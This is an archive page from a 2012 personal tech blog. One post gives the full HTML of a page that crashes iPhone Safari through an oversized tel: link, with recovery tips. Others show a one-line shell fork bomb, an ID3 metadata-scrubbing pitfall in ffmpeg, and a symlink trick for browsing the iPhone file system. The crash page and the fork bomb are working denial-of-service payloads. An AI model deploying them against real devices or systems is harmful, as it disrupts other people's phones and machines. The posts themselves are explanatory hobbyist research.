September 2012 Archives
Thu Sep 27 13:58:04 UTC 2012
iPhone Safari crash (other browsers too...)
It doesn't go much simpler than this:
<!DOCTYPE html>
<html>
<meta http-equiv="refresh" content="3;URL=tel:(4MB of X)">
<title>DIE, iPhone, DIE!</title>
<body>
<h1>DIE, iPhone, DIE!</h1>
<p>
<img src="http://whitsblog.com/wp-content/uploads/2012/05/Rick-astley-never-gonna-give-you-up.jpg">
<br>
Never gonna browse the web!
</p>
</body>
</html>
Even Force Quit won't stop it... but the watchdog timer, or the reboot trick (hold both buttons for a few seconds) will.
But this is a HUGE file...
My browser is crashing .............
I warned you about crash bro!!!!!
I told you dog!
It keeps happening
I told you man
I TOLD you about crash!
But seriously: how to remove it?
Ah... yes. Safari is so nice and even saves the open tabs before crashing the phone.
Either you can be fast and close the tab before it fully loaded.
Or, you can enable and disable airplane mode browsing mode in settings, clear Safari's cache, open Safari, close the tab, disable airplane mode again (thanks to Sergeij2000 on the Heise forum for this hint).
Or, you can enable and disable private browsing mode in Safari's settings, and when asked whether you want to close all tabs, confirm (thanks to ticaki on the Heise forum for this hint).
UPDATE: Try
this link to get an idea of why it seems to crash. This one is
so short it does not cause a crash, however, it does cause display
corruption (dialog text overwriting dialog buttons) on the iPhone.
Apparently the crash bug of the iPhone is in formatting the
confirmation message dialog box... and it then ends up looking like
this:
UPDATE: This vulnerability is not new, Apple should be aware it for 3 years now and hasn't fixed it yet. See: CVE-2009-3271
Wed Sep 12 14:59:03 UTC 2012
Scrubbing Metadata is Not Easy
Take some random MP3 file.
$ dd if=/dev/urandom bs=1k count=1024 | lame -r -s 44.1 -m s - test.mp3 1024+0 records in 1024+0 records out 1048576 bytes (1.0 MB) copied, 0.18162 s, 5.8 MB/s Assuming raw pcm input file LAME 3.99.5 64bits (http://lame.sf.net) Using polyphase lowpass filter, transition band: 16538 Hz - 17071 Hz Encoding <stdin> to test.mp3 Encoding as 44.1 kHz stereo MPEG-1 Layer III (11x) 128 kbps qval=3
Add some ID3 tags to it...
$ perl -e 'printf "TAGThis is tag number %-105d\xFF", $_ for reverse 1..8' >> test.mp3 $ id3v2 -l test.mp3 id3v1 tag info for test.mp3: Title : This is tag number 1 Artist: Album : Year: , Genre: Unknown (255) Comment: test.mp3: No ID3v2 tag
Try remuxing it using ffmpeg, and instruct
ffmpeg to remove metadata (see manpage):
$ ffmpeg -i test.mp3 -map_metadata -1 -c:a copy test-2.mp3
ffmpeg version 0.11.1 Copyright (c) 2000-2012 the FFmpeg developers
built on Jun 9 2012 13:50:13 with gcc 4.7.0 20120505 (prerelease)
configuration: --prefix=/usr --enable-libmp3lame --enable-libvorbis --enable-libxvid --enable-libx264 --enable-libvpx --enable-libtheora --enable-libgsm --enable-libspeex --enable-postproc --enable-shared --enable-x11grab --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libschroedinger --enable-libopenjpeg --enable-librtmp --enable-libpulse --enable-libv4l2 --enable-gpl --enable-version3 --enable-runtime-cpudetect --disable-debug --disable-static
libavutil 51. 54.100 / 51. 54.100
libavcodec 54. 23.100 / 54. 23.100
libavformat 54. 6.100 / 54. 6.100
libavdevice 54. 0.100 / 54. 0.100
libavfilter 2. 77.100 / 2. 77.100
libswscale 2. 1.100 / 2. 1.100
libswresample 0. 15.100 / 0. 15.100
libpostproc 52. 0.100 / 52. 0.100
[mp3 @ 0x237a100] max_analyze_duration 5000000 reached at 5015510
Input #0, mp3, from 'test.mp3':
Metadata:
title : This is tag number 1
artist :
album :
date :
comment :
Duration: 00:00:05.98, start: 0.000000, bitrate: 129 kb/s
Stream #0:0: Audio: mp3, 44100 Hz, stereo, s16, 128 kb/s
Output #0, mp3, to 'test-2.mp3':
Metadata:
TSSE : Lavf54.6.100
Stream #0:0: Audio: mp3, 44100 Hz, stereo, 128 kb/s
Stream mapping:
Stream #0:0 -> #0:0 (copy)
Press [q] to stop, [?] for help
size= 95kB time=00:00:06.00 bitrate= 129.2kbits/s
video:0kB audio:94kB global headers:0kB muxing overhead 0.466835%
Metadata is in input, but not in output. Looks like it worked, right? To make absolutely sure, let's do it again:
$ ffmpeg -i test-2.mp3 -map_metadata -1 -c:a copy test-3.mp3
ffmpeg version 0.11.1 Copyright (c) 2000-2012 the FFmpeg developers
built on Jun 9 2012 13:50:13 with gcc 4.7.0 20120505 (prerelease)
configuration: --prefix=/usr --enable-libmp3lame --enable-libvorbis --enable-libxvid --enable-libx264 --enable-libvpx --enable-libtheora --enable-libgsm --enable-libspeex --enable-postproc --enable-shared --enable-x11grab --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libschroedinger --enable-libopenjpeg --enable-librtmp --enable-libpulse --enable-libv4l2 --enable-gpl --enable-version3 --enable-runtime-cpudetect --disable-debug --disable-static
libavutil 51. 54.100 / 51. 54.100
libavcodec 54. 23.100 / 54. 23.100
libavformat 54. 6.100 / 54. 6.100
libavdevice 54. 0.100 / 54. 0.100
libavfilter 2. 77.100 / 2. 77.100
libswscale 2. 1.100 / 2. 1.100
libswresample 0. 15.100 / 0. 15.100
libpostproc 52. 0.100 / 52. 0.100
[mp3 @ 0x259c100] max_analyze_duration 5000000 reached at 5015510
Input #0, mp3, from 'test-2.mp3':
Metadata:
encoder : Lavf54.6.100
Duration: 00:00:06.00, start: 0.000000, bitrate: 129 kb/s
Stream #0:0: Audio: mp3, 44100 Hz, stereo, s16, 128 kb/s
Output #0, mp3, to 'test-3.mp3':
Metadata:
TSSE : Lavf54.6.100
Stream #0:0: Audio: mp3, 44100 Hz, stereo, 128 kb/s
Stream mapping:
Stream #0:0 -> #0:0 (copy)
Press [q] to stop, [?] for help
size= 95kB time=00:00:06.00 bitrate= 129.1kbits/s
video:0kB audio:94kB global headers:0kB muxing overhead 0.467454%
Indeed, my Title tag is no longer displayed by ffmpeg. Now the
output file of this should be twice as clean, right? Let's see with
ffprobe...
$ ffprobe test-3.mp3
ffprobe version 0.11.1 Copyright (c) 2007-2012 the FFmpeg developers
built on Jun 9 2012 13:50:13 with gcc 4.7.0 20120505 (prerelease)
configuration: --prefix=/usr --enable-libmp3lame --enable-libvorbis --enable-libxvid --enable-libx264 --enable-libvpx --enable-libtheora --enable-libgsm --enable-libspeex --enable-postproc --enable-shared --enable-x11grab --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libschroedinger --enable-libopenjpeg --enable-librtmp --enable-libpulse --enable-libv4l2 --enable-gpl --enable-version3 --enable-runtime-cpudetect --disable-debug --disable-static
libavutil 51. 54.100 / 51. 54.100
libavcodec 54. 23.100 / 54. 23.100
libavformat 54. 6.100 / 54. 6.100
libavdevice 54. 0.100 / 54. 0.100
libavfilter 2. 77.100 / 2. 77.100
libswscale 2. 1.100 / 2. 1.100
libswresample 0. 15.100 / 0. 15.100
libpostproc 52. 0.100 / 52. 0.100
[mp3 @ 0x12df240] max_analyze_duration 5000000 reached at 5015510
Input #0, mp3, from 'test-3.mp3':
Metadata:
encoder : Lavf54.6.100
Duration: 00:00:06.00, start: 0.000000, bitrate: 129 kb/s
Stream #0:0: Audio: mp3, 44100 Hz, stereo, s16, 128 kb/s
Clean indeed.
$ id3v2 -l test-3.mp3 id3v1 tag info for test-3.mp3: Title : This is tag number 3 Artist: Album : Year: , Genre: Unknown (255) Comment: test-3.mp3: No ID3v2 tag
Trust no one.
Wed Sep 12 14:42:09 UTC 2012
Funny Forkbomb
This shell script is a (single-forking-process) fork bomb in
dash and busybox sh, but not in
bash and ksh:
#!/bin/sh S=`yes|head -n 32769`;while :;do exec<<S;done $S S
Why? And why exactly 32769?
Actually a neat trick to avoid tempfiles for here-documents,
like bash uses...
Wed Sep 12 14:28:28 UTC 2012
Exploring the iPhone file system sandbox
There is a little known way to explore the iPhone file system without jailbreaking, at least on iPhone 4 and iOS 5.1.1:
- Take any app with file browser or FTP server functionality.
- Create a relative symbolic link to the file system root in its
Documents folder:
$ ifuse --appid APPID ~/mnt $ cd ~/mnt $ ln -snf ../../../../../.. root
- Open the app (or the FTP client)
- Enjoy!
Note that sandbox restrictions still apply; you will not be able to read another app's data this way.
I also did a brute force search for writable directories outside the app sandbox, and did not find any. I wrote this script for the purpose:
#!/usr/bin/perl
use strict;
use warnings;
use Net::FTP;
my $list_regex = qr/
^
(?<type>d)
(?<perms>\S+)
\s+
(?<links>\S+)
\s+
(?<user>\S+)
\s+
(?<group>\S+)
\s+
(?<size>\S+)
\s+
(?<date>\w\w\w\ .{8})
\s+
(?<name>.*)
$
/x;
@ARGV == 5
or die "Usage: $0 host port user pass root";
my ($host, $port, $user, $pass, $root) = @ARGV;
my $ftp = Net::FTP->new("$host:$port", Debug => 0, Passive => 1)
or die "No ftp: $@";
$ftp->login($user, $pass)
or die "No user/pass: $ftp->message";
open my $fh, ">", "ls-lR.txt"
or warn ">ls-lR.txt: $!";
my @results = ();
my @queue = ($root);
while(@queue)
{
my $item = shift @queue;
print STDERR "[$item] found @{[scalar @results]} results\n";
$ftp->mkdir($item . "/WRITETEST");
my $list = $ftp->dir($item);
print $fh "$item:\n";
for(@$list)
{
print $fh "$_\n";
/$list_regex/
or next;
my $name = $+{name};
next
if $name eq '.' or $name eq '..';
if($name eq 'WRITETEST')
{
push @results, $item;
$ftp->rmdir($item . "/WRITETEST");
next;
}
push @queue, "$item/$name";
}
print $fh "\n";
}
close $fh;
print "$_\n"
for @results;
$ftp->quit;
UPDATE: This symlink hack has been fixed in iOS
6. I found a new way to create this link; however, apparently due
to an issue in ideviceinstaller, doing this loses the
Documents content of the app:
$ ideviceinstaller -o uninstall -o remove -o copy=. -a com.dspmobile.dbmeterpro $ unzip -l com.dspmobile.dbmeterpro.ipa $ mkdir -p "Payload/dB Meter Pro.app" $ ln -snf ../../../../../.. "Payload/dB Meter Pro.app/root" $ zip -0y com.dspmobile.dbmeterpro.ipa "Payload/dB Meter Pro.app/root" $ ideviceinstaller -i com.dspmobile.dbmeterpro.ipa $ ifuse --appid com.dspmobile.dbmeterpro ~/mnt $ ln -snf "../dB Meter Pro.app/root" ~/mnt/root $ fusermount -u ~/mnt